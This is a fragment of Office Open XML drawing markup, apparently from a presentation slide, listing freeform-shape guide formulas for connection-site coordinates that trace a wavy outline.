              <a:gd name="connsiteX157" fmla="*/ 5789867 w 12192000"/>
              <a:gd name="connsiteY157" fmla="*/ 150304 h 4939827"/>
              <a:gd name="connsiteX158" fmla="*/ 5825953 w 12192000"/>
              <a:gd name="connsiteY158" fmla="*/ 147907 h 4939827"/>
              <a:gd name="connsiteX159" fmla="*/ 5856168 w 12192000"/>
              <a:gd name="connsiteY159" fmla="*/ 158719 h 4939827"/>
              <a:gd name="connsiteX160" fmla="*/ 5862476 w 12192000"/>
              <a:gd name="connsiteY160" fmla="*/ 172447 h 4939827"/>
              <a:gd name="connsiteX161" fmla="*/ 5882195 w 12192000"/>
              <a:gd name="connsiteY161" fmla="*/ 173195 h 4939827"/>
              <a:gd name="connsiteX162" fmla="*/ 5887271 w 12192000"/>
              <a:gd name="connsiteY162" fmla="*/ 176084 h 4939827"/>
              <a:gd name="connsiteX163" fmla="*/ 5916552 w 12192000"/>
              <a:gd name="connsiteY163" fmla="*/ 189955 h 4939827"/>
              <a:gd name="connsiteX164" fmla="*/ 5983240 w 12192000"/>
              <a:gd name="connsiteY164" fmla="*/ 152755 h 4939827"/>
              <a:gd name="connsiteX165" fmla="*/ 6061852 w 12192000"/>
              <a:gd name="connsiteY165" fmla="*/ 161953 h 4939827"/>
              <a:gd name="connsiteX166" fmla="*/ 6408386 w 12192000"/>
              <a:gd name="connsiteY166" fmla="*/ 157590 h 4939827"/>
              <a:gd name="connsiteX167" fmla="*/ 6531386 w 12192000"/>
              <a:gd name="connsiteY167" fmla="*/ 156103 h 4939827"/>
              <a:gd name="connsiteX168" fmla="*/ 6721509 w 12192000"/>
              <a:gd name="connsiteY168" fmla="*/ 54829 h 4939827"/>
              <a:gd name="connsiteX169" fmla="*/ 6947884 w 12192000"/>
              <a:gd name="connsiteY169" fmla="*/ 47587 h 4939827"/>
              <a:gd name="connsiteX170" fmla="*/ 6965101 w 12192000"/>
              <a:gd name="connsiteY170" fmla="*/ 25718 h 4939827"/>
              <a:gd name="connsiteX171" fmla="*/ 6986370 w 12192000"/>
              <a:gd name="connsiteY171" fmla="*/ 12659 h 4939827"/>
              <a:gd name="connsiteX172" fmla="*/ 6989536 w 12192000"/>
              <a:gd name="connsiteY172" fmla="*/ 14528 h 4939827"/>
              <a:gd name="connsiteX173" fmla="*/ 7015933 w 12192000"/>
              <a:gd name="connsiteY173" fmla="*/ 9653 h 4939827"/>
              <a:gd name="connsiteX174" fmla="*/ 7020592 w 12192000"/>
              <a:gd name="connsiteY174" fmla="*/ 1651 h 4939827"/>
              <a:gd name="connsiteX175" fmla="*/ 7025905 w 12192000"/>
              <a:gd name="connsiteY17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680829 w 12192000"/>
              <a:gd name="connsiteY145" fmla="*/ 287953 h 4939827"/>
              <a:gd name="connsiteX146" fmla="*/ 4807427 w 12192000"/>
              <a:gd name="connsiteY146" fmla="*/ 276835 h 4939827"/>
              <a:gd name="connsiteX147" fmla="*/ 5028933 w 12192000"/>
              <a:gd name="connsiteY147" fmla="*/ 183887 h 4939827"/>
              <a:gd name="connsiteX148" fmla="*/ 5093642 w 12192000"/>
              <a:gd name="connsiteY148" fmla="*/ 177214 h 4939827"/>
              <a:gd name="connsiteX149" fmla="*/ 5102642 w 12192000"/>
              <a:gd name="connsiteY149" fmla="*/ 186816 h 4939827"/>
              <a:gd name="connsiteX150" fmla="*/ 5193590 w 12192000"/>
              <a:gd name="connsiteY150" fmla="*/ 136361 h 4939827"/>
              <a:gd name="connsiteX151" fmla="*/ 5323922 w 12192000"/>
              <a:gd name="connsiteY151" fmla="*/ 146332 h 4939827"/>
              <a:gd name="connsiteX152" fmla="*/ 5421860 w 12192000"/>
              <a:gd name="connsiteY152" fmla="*/ 167298 h 4939827"/>
              <a:gd name="connsiteX153" fmla="*/ 5476948 w 12192000"/>
              <a:gd name="connsiteY153" fmla="*/ 173249 h 4939827"/>
              <a:gd name="connsiteX154" fmla="*/ 5516842 w 12192000"/>
              <a:gd name="connsiteY154" fmla="*/ 184018 h 4939827"/>
              <a:gd name="connsiteX155" fmla="*/ 5619415 w 12192000"/>
              <a:gd name="connsiteY155" fmla="*/ 176781 h 4939827"/>
              <a:gd name="connsiteX156" fmla="*/ 5789867 w 12192000"/>
              <a:gd name="connsiteY156" fmla="*/ 150304 h 4939827"/>
              <a:gd name="connsiteX157" fmla="*/ 5825953 w 12192000"/>
              <a:gd name="connsiteY157" fmla="*/ 147907 h 4939827"/>
              <a:gd name="connsiteX158" fmla="*/ 5856168 w 12192000"/>
              <a:gd name="connsiteY158" fmla="*/ 158719 h 4939827"/>
              <a:gd name="connsiteX159" fmla="*/ 5862476 w 12192000"/>
              <a:gd name="connsiteY159" fmla="*/ 172447 h 4939827"/>
              <a:gd name="connsiteX160" fmla="*/ 5882195 w 12192000"/>
              <a:gd name="connsiteY160" fmla="*/ 173195 h 4939827"/>
              <a:gd name="connsiteX161" fmla="*/ 5887271 w 12192000"/>
              <a:gd name="connsiteY161" fmla="*/ 176084 h 4939827"/>
              <a:gd name="connsiteX162" fmla="*/ 5916552 w 12192000"/>
              <a:gd name="connsiteY162" fmla="*/ 189955 h 4939827"/>
              <a:gd name="connsiteX163" fmla="*/ 5983240 w 12192000"/>
              <a:gd name="connsiteY163" fmla="*/ 152755 h 4939827"/>
              <a:gd name="connsiteX164" fmla="*/ 6061852 w 12192000"/>
              <a:gd name="connsiteY164" fmla="*/ 161953 h 4939827"/>
              <a:gd name="connsiteX165" fmla="*/ 6408386 w 12192000"/>
              <a:gd name="connsiteY165" fmla="*/ 157590 h 4939827"/>
              <a:gd name="connsiteX166" fmla="*/ 6531386 w 12192000"/>
              <a:gd name="connsiteY166" fmla="*/ 156103 h 4939827"/>
              <a:gd name="connsiteX167" fmla="*/ 6721509 w 12192000"/>
              <a:gd name="connsiteY167" fmla="*/ 54829 h 4939827"/>
              <a:gd name="connsiteX168" fmla="*/ 6947884 w 12192000"/>
              <a:gd name="connsiteY168" fmla="*/ 47587 h 4939827"/>
              <a:gd name="connsiteX169" fmla="*/ 6965101 w 12192000"/>
              <a:gd name="connsiteY169" fmla="*/ 25718 h 4939827"/>
              <a:gd name="connsiteX170" fmla="*/ 6986370 w 12192000"/>
              <a:gd name="connsiteY170" fmla="*/ 12659 h 4939827"/>
              <a:gd name="connsiteX171" fmla="*/ 6989536 w 12192000"/>
              <a:gd name="connsiteY171" fmla="*/ 14528 h 4939827"/>
              <a:gd name="connsiteX172" fmla="*/ 7015933 w 12192000"/>
              <a:gd name="connsiteY172" fmla="*/ 9653 h 4939827"/>
              <a:gd name="connsiteX173" fmla="*/ 7020592 w 12192000"/>
              <a:gd name="connsiteY173" fmla="*/ 1651 h 4939827"/>
              <a:gd name="connsiteX174" fmla="*/ 7025905 w 12192000"/>
              <a:gd name="connsiteY17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08386 w 12192000"/>
              <a:gd name="connsiteY164" fmla="*/ 157590 h 4939827"/>
              <a:gd name="connsiteX165" fmla="*/ 6531386 w 12192000"/>
              <a:gd name="connsiteY165" fmla="*/ 156103 h 4939827"/>
              <a:gd name="connsiteX166" fmla="*/ 6721509 w 12192000"/>
              <a:gd name="connsiteY166" fmla="*/ 54829 h 4939827"/>
              <a:gd name="connsiteX167" fmla="*/ 6947884 w 12192000"/>
              <a:gd name="connsiteY167" fmla="*/ 47587 h 4939827"/>
              <a:gd name="connsiteX168" fmla="*/ 6965101 w 12192000"/>
              <a:gd name="connsiteY168" fmla="*/ 25718 h 4939827"/>
              <a:gd name="connsiteX169" fmla="*/ 6986370 w 12192000"/>
              <a:gd name="connsiteY169" fmla="*/ 12659 h 4939827"/>
              <a:gd name="connsiteX170" fmla="*/ 6989536 w 12192000"/>
              <a:gd name="connsiteY170" fmla="*/ 14528 h 4939827"/>
              <a:gd name="connsiteX171" fmla="*/ 7015933 w 12192000"/>
              <a:gd name="connsiteY171" fmla="*/ 9653 h 4939827"/>
              <a:gd name="connsiteX172" fmla="*/ 7020592 w 12192000"/>
              <a:gd name="connsiteY172" fmla="*/ 1651 h 4939827"/>
              <a:gd name="connsiteX173" fmla="*/ 7025905 w 12192000"/>
              <a:gd name="connsiteY17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21509 w 12192000"/>
              <a:gd name="connsiteY165" fmla="*/ 54829 h 4939827"/>
              <a:gd name="connsiteX166" fmla="*/ 6947884 w 12192000"/>
              <a:gd name="connsiteY166" fmla="*/ 47587 h 4939827"/>
              <a:gd name="connsiteX167" fmla="*/ 6965101 w 12192000"/>
              <a:gd name="connsiteY167" fmla="*/ 25718 h 4939827"/>
              <a:gd name="connsiteX168" fmla="*/ 6986370 w 12192000"/>
              <a:gd name="connsiteY168" fmla="*/ 12659 h 4939827"/>
              <a:gd name="connsiteX169" fmla="*/ 6989536 w 12192000"/>
              <a:gd name="connsiteY169" fmla="*/ 14528 h 4939827"/>
              <a:gd name="connsiteX170" fmla="*/ 7015933 w 12192000"/>
              <a:gd name="connsiteY170" fmla="*/ 9653 h 4939827"/>
              <a:gd name="connsiteX171" fmla="*/ 7020592 w 12192000"/>
              <a:gd name="connsiteY171" fmla="*/ 1651 h 4939827"/>
              <a:gd name="connsiteX172" fmla="*/ 7025905 w 12192000"/>
              <a:gd name="connsiteY17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947884 w 12192000"/>
              <a:gd name="connsiteY165" fmla="*/ 47587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531386 w 12192000"/>
              <a:gd name="connsiteY164" fmla="*/ 156103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061852 w 12192000"/>
              <a:gd name="connsiteY163" fmla="*/ 161953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37675 w 12192000"/>
              <a:gd name="connsiteY17" fmla="*/ 204438 h 4939827"/>
              <a:gd name="connsiteX18" fmla="*/ 7952584 w 12192000"/>
              <a:gd name="connsiteY18" fmla="*/ 170181 h 4939827"/>
              <a:gd name="connsiteX19" fmla="*/ 8009534 w 12192000"/>
              <a:gd name="connsiteY19" fmla="*/ 176441 h 4939827"/>
              <a:gd name="connsiteX20" fmla="*/ 8058681 w 12192000"/>
              <a:gd name="connsiteY20" fmla="*/ 219431 h 4939827"/>
              <a:gd name="connsiteX21" fmla="*/ 8126175 w 12192000"/>
              <a:gd name="connsiteY21" fmla="*/ 240005 h 4939827"/>
              <a:gd name="connsiteX22" fmla="*/ 8166439 w 12192000"/>
              <a:gd name="connsiteY22" fmla="*/ 252699 h 4939827"/>
              <a:gd name="connsiteX23" fmla="*/ 8281371 w 12192000"/>
              <a:gd name="connsiteY23" fmla="*/ 256875 h 4939827"/>
              <a:gd name="connsiteX24" fmla="*/ 8381609 w 12192000"/>
              <a:gd name="connsiteY24" fmla="*/ 240618 h 4939827"/>
              <a:gd name="connsiteX25" fmla="*/ 8406759 w 12192000"/>
              <a:gd name="connsiteY25" fmla="*/ 232517 h 4939827"/>
              <a:gd name="connsiteX26" fmla="*/ 8426506 w 12192000"/>
              <a:gd name="connsiteY26" fmla="*/ 241842 h 4939827"/>
              <a:gd name="connsiteX27" fmla="*/ 8427949 w 12192000"/>
              <a:gd name="connsiteY27" fmla="*/ 240981 h 4939827"/>
              <a:gd name="connsiteX28" fmla="*/ 8441468 w 12192000"/>
              <a:gd name="connsiteY28" fmla="*/ 241157 h 4939827"/>
              <a:gd name="connsiteX29" fmla="*/ 8565757 w 12192000"/>
              <a:gd name="connsiteY29" fmla="*/ 255317 h 4939827"/>
              <a:gd name="connsiteX30" fmla="*/ 8573171 w 12192000"/>
              <a:gd name="connsiteY30" fmla="*/ 258426 h 4939827"/>
              <a:gd name="connsiteX31" fmla="*/ 8573548 w 12192000"/>
              <a:gd name="connsiteY31" fmla="*/ 258241 h 4939827"/>
              <a:gd name="connsiteX32" fmla="*/ 8581827 w 12192000"/>
              <a:gd name="connsiteY32" fmla="*/ 261028 h 4939827"/>
              <a:gd name="connsiteX33" fmla="*/ 8586687 w 12192000"/>
              <a:gd name="connsiteY33" fmla="*/ 264089 h 4939827"/>
              <a:gd name="connsiteX34" fmla="*/ 8601067 w 12192000"/>
              <a:gd name="connsiteY34" fmla="*/ 270114 h 4939827"/>
              <a:gd name="connsiteX35" fmla="*/ 8672650 w 12192000"/>
              <a:gd name="connsiteY35" fmla="*/ 254821 h 4939827"/>
              <a:gd name="connsiteX36" fmla="*/ 8785543 w 12192000"/>
              <a:gd name="connsiteY36" fmla="*/ 263406 h 4939827"/>
              <a:gd name="connsiteX37" fmla="*/ 8830588 w 12192000"/>
              <a:gd name="connsiteY37" fmla="*/ 265483 h 4939827"/>
              <a:gd name="connsiteX38" fmla="*/ 8905142 w 12192000"/>
              <a:gd name="connsiteY38" fmla="*/ 264958 h 4939827"/>
              <a:gd name="connsiteX39" fmla="*/ 8968582 w 12192000"/>
              <a:gd name="connsiteY39" fmla="*/ 262728 h 4939827"/>
              <a:gd name="connsiteX40" fmla="*/ 8972994 w 12192000"/>
              <a:gd name="connsiteY40" fmla="*/ 263284 h 4939827"/>
              <a:gd name="connsiteX41" fmla="*/ 9004605 w 12192000"/>
              <a:gd name="connsiteY41" fmla="*/ 258041 h 4939827"/>
              <a:gd name="connsiteX42" fmla="*/ 9016165 w 12192000"/>
              <a:gd name="connsiteY42" fmla="*/ 261258 h 4939827"/>
              <a:gd name="connsiteX43" fmla="*/ 9043297 w 12192000"/>
              <a:gd name="connsiteY43" fmla="*/ 281547 h 4939827"/>
              <a:gd name="connsiteX44" fmla="*/ 9048315 w 12192000"/>
              <a:gd name="connsiteY44" fmla="*/ 279264 h 4939827"/>
              <a:gd name="connsiteX45" fmla="*/ 9054706 w 12192000"/>
              <a:gd name="connsiteY45" fmla="*/ 278538 h 4939827"/>
              <a:gd name="connsiteX46" fmla="*/ 9070919 w 12192000"/>
              <a:gd name="connsiteY46" fmla="*/ 281810 h 4939827"/>
              <a:gd name="connsiteX47" fmla="*/ 9076813 w 12192000"/>
              <a:gd name="connsiteY47" fmla="*/ 283909 h 4939827"/>
              <a:gd name="connsiteX48" fmla="*/ 9085871 w 12192000"/>
              <a:gd name="connsiteY48" fmla="*/ 285133 h 4939827"/>
              <a:gd name="connsiteX49" fmla="*/ 9086159 w 12192000"/>
              <a:gd name="connsiteY49" fmla="*/ 284887 h 4939827"/>
              <a:gd name="connsiteX50" fmla="*/ 9134606 w 12192000"/>
              <a:gd name="connsiteY50" fmla="*/ 288168 h 4939827"/>
              <a:gd name="connsiteX51" fmla="*/ 9195590 w 12192000"/>
              <a:gd name="connsiteY51" fmla="*/ 279568 h 4939827"/>
              <a:gd name="connsiteX52" fmla="*/ 9219336 w 12192000"/>
              <a:gd name="connsiteY52" fmla="*/ 278133 h 4939827"/>
              <a:gd name="connsiteX53" fmla="*/ 9232362 w 12192000"/>
              <a:gd name="connsiteY53" fmla="*/ 275894 h 4939827"/>
              <a:gd name="connsiteX54" fmla="*/ 9233396 w 12192000"/>
              <a:gd name="connsiteY54" fmla="*/ 274803 h 4939827"/>
              <a:gd name="connsiteX55" fmla="*/ 9256213 w 12192000"/>
              <a:gd name="connsiteY55" fmla="*/ 281576 h 4939827"/>
              <a:gd name="connsiteX56" fmla="*/ 9262377 w 12192000"/>
              <a:gd name="connsiteY56" fmla="*/ 286635 h 4939827"/>
              <a:gd name="connsiteX57" fmla="*/ 9287089 w 12192000"/>
              <a:gd name="connsiteY57" fmla="*/ 303891 h 4939827"/>
              <a:gd name="connsiteX58" fmla="*/ 9371484 w 12192000"/>
              <a:gd name="connsiteY58" fmla="*/ 329634 h 4939827"/>
              <a:gd name="connsiteX59" fmla="*/ 9404829 w 12192000"/>
              <a:gd name="connsiteY59" fmla="*/ 339038 h 4939827"/>
              <a:gd name="connsiteX60" fmla="*/ 9427021 w 12192000"/>
              <a:gd name="connsiteY60" fmla="*/ 358784 h 4939827"/>
              <a:gd name="connsiteX61" fmla="*/ 9670844 w 12192000"/>
              <a:gd name="connsiteY61" fmla="*/ 405128 h 4939827"/>
              <a:gd name="connsiteX62" fmla="*/ 9816083 w 12192000"/>
              <a:gd name="connsiteY62" fmla="*/ 416573 h 4939827"/>
              <a:gd name="connsiteX63" fmla="*/ 9936741 w 12192000"/>
              <a:gd name="connsiteY63" fmla="*/ 437044 h 4939827"/>
              <a:gd name="connsiteX64" fmla="*/ 10050093 w 12192000"/>
              <a:gd name="connsiteY64" fmla="*/ 443783 h 4939827"/>
              <a:gd name="connsiteX65" fmla="*/ 10130090 w 12192000"/>
              <a:gd name="connsiteY65" fmla="*/ 459520 h 4939827"/>
              <a:gd name="connsiteX66" fmla="*/ 10173456 w 12192000"/>
              <a:gd name="connsiteY66" fmla="*/ 457749 h 4939827"/>
              <a:gd name="connsiteX67" fmla="*/ 10218232 w 12192000"/>
              <a:gd name="connsiteY67" fmla="*/ 459820 h 4939827"/>
              <a:gd name="connsiteX68" fmla="*/ 10354176 w 12192000"/>
              <a:gd name="connsiteY68" fmla="*/ 471377 h 4939827"/>
              <a:gd name="connsiteX69" fmla="*/ 10430681 w 12192000"/>
              <a:gd name="connsiteY69" fmla="*/ 481226 h 4939827"/>
              <a:gd name="connsiteX70" fmla="*/ 10478169 w 12192000"/>
              <a:gd name="connsiteY70" fmla="*/ 481774 h 4939827"/>
              <a:gd name="connsiteX71" fmla="*/ 10540907 w 12192000"/>
              <a:gd name="connsiteY71" fmla="*/ 485607 h 4939827"/>
              <a:gd name="connsiteX72" fmla="*/ 10614941 w 12192000"/>
              <a:gd name="connsiteY72" fmla="*/ 487592 h 4939827"/>
              <a:gd name="connsiteX73" fmla="*/ 10674098 w 12192000"/>
              <a:gd name="connsiteY73" fmla="*/ 521656 h 4939827"/>
              <a:gd name="connsiteX74" fmla="*/ 10874834 w 12192000"/>
              <a:gd name="connsiteY74" fmla="*/ 574867 h 4939827"/>
              <a:gd name="connsiteX75" fmla="*/ 10944981 w 12192000"/>
              <a:gd name="connsiteY75" fmla="*/ 615042 h 4939827"/>
              <a:gd name="connsiteX76" fmla="*/ 11006376 w 12192000"/>
              <a:gd name="connsiteY76" fmla="*/ 645957 h 4939827"/>
              <a:gd name="connsiteX77" fmla="*/ 11076308 w 12192000"/>
              <a:gd name="connsiteY77" fmla="*/ 675698 h 4939827"/>
              <a:gd name="connsiteX78" fmla="*/ 11148789 w 12192000"/>
              <a:gd name="connsiteY78" fmla="*/ 685041 h 4939827"/>
              <a:gd name="connsiteX79" fmla="*/ 11249129 w 12192000"/>
              <a:gd name="connsiteY79" fmla="*/ 684218 h 4939827"/>
              <a:gd name="connsiteX80" fmla="*/ 11299915 w 12192000"/>
              <a:gd name="connsiteY80" fmla="*/ 692177 h 4939827"/>
              <a:gd name="connsiteX81" fmla="*/ 11386973 w 12192000"/>
              <a:gd name="connsiteY81" fmla="*/ 708209 h 4939827"/>
              <a:gd name="connsiteX82" fmla="*/ 11500105 w 12192000"/>
              <a:gd name="connsiteY82" fmla="*/ 735014 h 4939827"/>
              <a:gd name="connsiteX83" fmla="*/ 11621735 w 12192000"/>
              <a:gd name="connsiteY83" fmla="*/ 789584 h 4939827"/>
              <a:gd name="connsiteX84" fmla="*/ 11691200 w 12192000"/>
              <a:gd name="connsiteY84" fmla="*/ 867902 h 4939827"/>
              <a:gd name="connsiteX85" fmla="*/ 11819427 w 12192000"/>
              <a:gd name="connsiteY85" fmla="*/ 911634 h 4939827"/>
              <a:gd name="connsiteX86" fmla="*/ 11969720 w 12192000"/>
              <a:gd name="connsiteY86" fmla="*/ 964737 h 4939827"/>
              <a:gd name="connsiteX87" fmla="*/ 12055766 w 12192000"/>
              <a:gd name="connsiteY87" fmla="*/ 991268 h 4939827"/>
              <a:gd name="connsiteX88" fmla="*/ 12171539 w 12192000"/>
              <a:gd name="connsiteY88" fmla="*/ 995427 h 4939827"/>
              <a:gd name="connsiteX89" fmla="*/ 12187831 w 12192000"/>
              <a:gd name="connsiteY89" fmla="*/ 996580 h 4939827"/>
              <a:gd name="connsiteX90" fmla="*/ 12192000 w 12192000"/>
              <a:gd name="connsiteY90" fmla="*/ 996726 h 4939827"/>
              <a:gd name="connsiteX91" fmla="*/ 12192000 w 12192000"/>
              <a:gd name="connsiteY91" fmla="*/ 4939827 h 4939827"/>
              <a:gd name="connsiteX92" fmla="*/ 0 w 12192000"/>
              <a:gd name="connsiteY92" fmla="*/ 4939827 h 4939827"/>
              <a:gd name="connsiteX93" fmla="*/ 0 w 12192000"/>
              <a:gd name="connsiteY93" fmla="*/ 512043 h 4939827"/>
              <a:gd name="connsiteX94" fmla="*/ 7381 w 12192000"/>
              <a:gd name="connsiteY94" fmla="*/ 512580 h 4939827"/>
              <a:gd name="connsiteX95" fmla="*/ 100029 w 12192000"/>
              <a:gd name="connsiteY95" fmla="*/ 504758 h 4939827"/>
              <a:gd name="connsiteX96" fmla="*/ 155244 w 12192000"/>
              <a:gd name="connsiteY96" fmla="*/ 525130 h 4939827"/>
              <a:gd name="connsiteX97" fmla="*/ 254366 w 12192000"/>
              <a:gd name="connsiteY97" fmla="*/ 534449 h 4939827"/>
              <a:gd name="connsiteX98" fmla="*/ 447292 w 12192000"/>
              <a:gd name="connsiteY98" fmla="*/ 542725 h 4939827"/>
              <a:gd name="connsiteX99" fmla="*/ 628105 w 12192000"/>
              <a:gd name="connsiteY99" fmla="*/ 547853 h 4939827"/>
              <a:gd name="connsiteX100" fmla="*/ 783146 w 12192000"/>
              <a:gd name="connsiteY100" fmla="*/ 591799 h 4939827"/>
              <a:gd name="connsiteX101" fmla="*/ 1043676 w 12192000"/>
              <a:gd name="connsiteY101" fmla="*/ 591887 h 4939827"/>
              <a:gd name="connsiteX102" fmla="*/ 1281816 w 12192000"/>
              <a:gd name="connsiteY102" fmla="*/ 520946 h 4939827"/>
              <a:gd name="connsiteX103" fmla="*/ 1486347 w 12192000"/>
              <a:gd name="connsiteY103" fmla="*/ 487310 h 4939827"/>
              <a:gd name="connsiteX104" fmla="*/ 1568079 w 12192000"/>
              <a:gd name="connsiteY104" fmla="*/ 462531 h 4939827"/>
              <a:gd name="connsiteX105" fmla="*/ 1622516 w 12192000"/>
              <a:gd name="connsiteY105" fmla="*/ 466058 h 4939827"/>
              <a:gd name="connsiteX106" fmla="*/ 1655457 w 12192000"/>
              <a:gd name="connsiteY106" fmla="*/ 465359 h 4939827"/>
              <a:gd name="connsiteX107" fmla="*/ 1717454 w 12192000"/>
              <a:gd name="connsiteY107" fmla="*/ 417203 h 4939827"/>
              <a:gd name="connsiteX108" fmla="*/ 1913794 w 12192000"/>
              <a:gd name="connsiteY108" fmla="*/ 365255 h 4939827"/>
              <a:gd name="connsiteX109" fmla="*/ 2129762 w 12192000"/>
              <a:gd name="connsiteY109" fmla="*/ 367832 h 4939827"/>
              <a:gd name="connsiteX110" fmla="*/ 2376970 w 12192000"/>
              <a:gd name="connsiteY110" fmla="*/ 350129 h 4939827"/>
              <a:gd name="connsiteX111" fmla="*/ 2480155 w 12192000"/>
              <a:gd name="connsiteY111" fmla="*/ 359227 h 4939827"/>
              <a:gd name="connsiteX112" fmla="*/ 2586782 w 12192000"/>
              <a:gd name="connsiteY112" fmla="*/ 339352 h 4939827"/>
              <a:gd name="connsiteX113" fmla="*/ 2654496 w 12192000"/>
              <a:gd name="connsiteY113" fmla="*/ 315431 h 4939827"/>
              <a:gd name="connsiteX114" fmla="*/ 2788947 w 12192000"/>
              <a:gd name="connsiteY114" fmla="*/ 250375 h 4939827"/>
              <a:gd name="connsiteX115" fmla="*/ 2885389 w 12192000"/>
              <a:gd name="connsiteY115" fmla="*/ 255259 h 4939827"/>
              <a:gd name="connsiteX116" fmla="*/ 3045916 w 12192000"/>
              <a:gd name="connsiteY116" fmla="*/ 261030 h 4939827"/>
              <a:gd name="connsiteX117" fmla="*/ 3074187 w 12192000"/>
              <a:gd name="connsiteY117" fmla="*/ 243226 h 4939827"/>
              <a:gd name="connsiteX118" fmla="*/ 3103677 w 12192000"/>
              <a:gd name="connsiteY118" fmla="*/ 209527 h 4939827"/>
              <a:gd name="connsiteX119" fmla="*/ 3126759 w 12192000"/>
              <a:gd name="connsiteY119" fmla="*/ 211226 h 4939827"/>
              <a:gd name="connsiteX120" fmla="*/ 3164020 w 12192000"/>
              <a:gd name="connsiteY120" fmla="*/ 212779 h 4939827"/>
              <a:gd name="connsiteX121" fmla="*/ 3285019 w 12192000"/>
              <a:gd name="connsiteY121" fmla="*/ 220535 h 4939827"/>
              <a:gd name="connsiteX122" fmla="*/ 3365154 w 12192000"/>
              <a:gd name="connsiteY122" fmla="*/ 226416 h 4939827"/>
              <a:gd name="connsiteX123" fmla="*/ 3367507 w 12192000"/>
              <a:gd name="connsiteY123" fmla="*/ 225416 h 4939827"/>
              <a:gd name="connsiteX124" fmla="*/ 3387567 w 12192000"/>
              <a:gd name="connsiteY124" fmla="*/ 227103 h 4939827"/>
              <a:gd name="connsiteX125" fmla="*/ 3424753 w 12192000"/>
              <a:gd name="connsiteY125" fmla="*/ 244380 h 4939827"/>
              <a:gd name="connsiteX126" fmla="*/ 3498001 w 12192000"/>
              <a:gd name="connsiteY126" fmla="*/ 231941 h 4939827"/>
              <a:gd name="connsiteX127" fmla="*/ 3561557 w 12192000"/>
              <a:gd name="connsiteY127" fmla="*/ 228095 h 4939827"/>
              <a:gd name="connsiteX128" fmla="*/ 3611920 w 12192000"/>
              <a:gd name="connsiteY128" fmla="*/ 218094 h 4939827"/>
              <a:gd name="connsiteX129" fmla="*/ 3620528 w 12192000"/>
              <a:gd name="connsiteY129" fmla="*/ 218788 h 4939827"/>
              <a:gd name="connsiteX130" fmla="*/ 3620766 w 12192000"/>
              <a:gd name="connsiteY130" fmla="*/ 218511 h 4939827"/>
              <a:gd name="connsiteX131" fmla="*/ 3629977 w 12192000"/>
              <a:gd name="connsiteY131" fmla="*/ 218664 h 4939827"/>
              <a:gd name="connsiteX132" fmla="*/ 3636217 w 12192000"/>
              <a:gd name="connsiteY132" fmla="*/ 220048 h 4939827"/>
              <a:gd name="connsiteX133" fmla="*/ 3709484 w 12192000"/>
              <a:gd name="connsiteY133" fmla="*/ 186927 h 4939827"/>
              <a:gd name="connsiteX134" fmla="*/ 3761342 w 12192000"/>
              <a:gd name="connsiteY134" fmla="*/ 177474 h 4939827"/>
              <a:gd name="connsiteX135" fmla="*/ 3799748 w 12192000"/>
              <a:gd name="connsiteY135" fmla="*/ 167154 h 4939827"/>
              <a:gd name="connsiteX136" fmla="*/ 3812225 w 12192000"/>
              <a:gd name="connsiteY136" fmla="*/ 189020 h 4939827"/>
              <a:gd name="connsiteX137" fmla="*/ 3864537 w 12192000"/>
              <a:gd name="connsiteY137" fmla="*/ 200742 h 4939827"/>
              <a:gd name="connsiteX138" fmla="*/ 4028476 w 12192000"/>
              <a:gd name="connsiteY138" fmla="*/ 223679 h 4939827"/>
              <a:gd name="connsiteX139" fmla="*/ 4191582 w 12192000"/>
              <a:gd name="connsiteY139" fmla="*/ 238952 h 4939827"/>
              <a:gd name="connsiteX140" fmla="*/ 4251024 w 12192000"/>
              <a:gd name="connsiteY140" fmla="*/ 240874 h 4939827"/>
              <a:gd name="connsiteX141" fmla="*/ 4355275 w 12192000"/>
              <a:gd name="connsiteY141" fmla="*/ 260205 h 4939827"/>
              <a:gd name="connsiteX142" fmla="*/ 4423807 w 12192000"/>
              <a:gd name="connsiteY142" fmla="*/ 270366 h 4939827"/>
              <a:gd name="connsiteX143" fmla="*/ 4558432 w 12192000"/>
              <a:gd name="connsiteY143" fmla="*/ 269194 h 4939827"/>
              <a:gd name="connsiteX144" fmla="*/ 4635061 w 12192000"/>
              <a:gd name="connsiteY144" fmla="*/ 280682 h 4939827"/>
              <a:gd name="connsiteX145" fmla="*/ 4807427 w 12192000"/>
              <a:gd name="connsiteY145" fmla="*/ 276835 h 4939827"/>
              <a:gd name="connsiteX146" fmla="*/ 5028933 w 12192000"/>
              <a:gd name="connsiteY146" fmla="*/ 183887 h 4939827"/>
              <a:gd name="connsiteX147" fmla="*/ 5093642 w 12192000"/>
              <a:gd name="connsiteY147" fmla="*/ 177214 h 4939827"/>
              <a:gd name="connsiteX148" fmla="*/ 5102642 w 12192000"/>
              <a:gd name="connsiteY148" fmla="*/ 186816 h 4939827"/>
              <a:gd name="connsiteX149" fmla="*/ 5193590 w 12192000"/>
              <a:gd name="connsiteY149" fmla="*/ 136361 h 4939827"/>
              <a:gd name="connsiteX150" fmla="*/ 5323922 w 12192000"/>
              <a:gd name="connsiteY150" fmla="*/ 146332 h 4939827"/>
              <a:gd name="connsiteX151" fmla="*/ 5421860 w 12192000"/>
              <a:gd name="connsiteY151" fmla="*/ 167298 h 4939827"/>
              <a:gd name="connsiteX152" fmla="*/ 5476948 w 12192000"/>
              <a:gd name="connsiteY152" fmla="*/ 173249 h 4939827"/>
              <a:gd name="connsiteX153" fmla="*/ 5516842 w 12192000"/>
              <a:gd name="connsiteY153" fmla="*/ 184018 h 4939827"/>
              <a:gd name="connsiteX154" fmla="*/ 5619415 w 12192000"/>
              <a:gd name="connsiteY154" fmla="*/ 176781 h 4939827"/>
              <a:gd name="connsiteX155" fmla="*/ 5789867 w 12192000"/>
              <a:gd name="connsiteY155" fmla="*/ 150304 h 4939827"/>
              <a:gd name="connsiteX156" fmla="*/ 5825953 w 12192000"/>
              <a:gd name="connsiteY156" fmla="*/ 147907 h 4939827"/>
              <a:gd name="connsiteX157" fmla="*/ 5856168 w 12192000"/>
              <a:gd name="connsiteY157" fmla="*/ 158719 h 4939827"/>
              <a:gd name="connsiteX158" fmla="*/ 5862476 w 12192000"/>
              <a:gd name="connsiteY158" fmla="*/ 172447 h 4939827"/>
              <a:gd name="connsiteX159" fmla="*/ 5882195 w 12192000"/>
              <a:gd name="connsiteY159" fmla="*/ 173195 h 4939827"/>
              <a:gd name="connsiteX160" fmla="*/ 5887271 w 12192000"/>
              <a:gd name="connsiteY160" fmla="*/ 176084 h 4939827"/>
              <a:gd name="connsiteX161" fmla="*/ 5916552 w 12192000"/>
              <a:gd name="connsiteY161" fmla="*/ 189955 h 4939827"/>
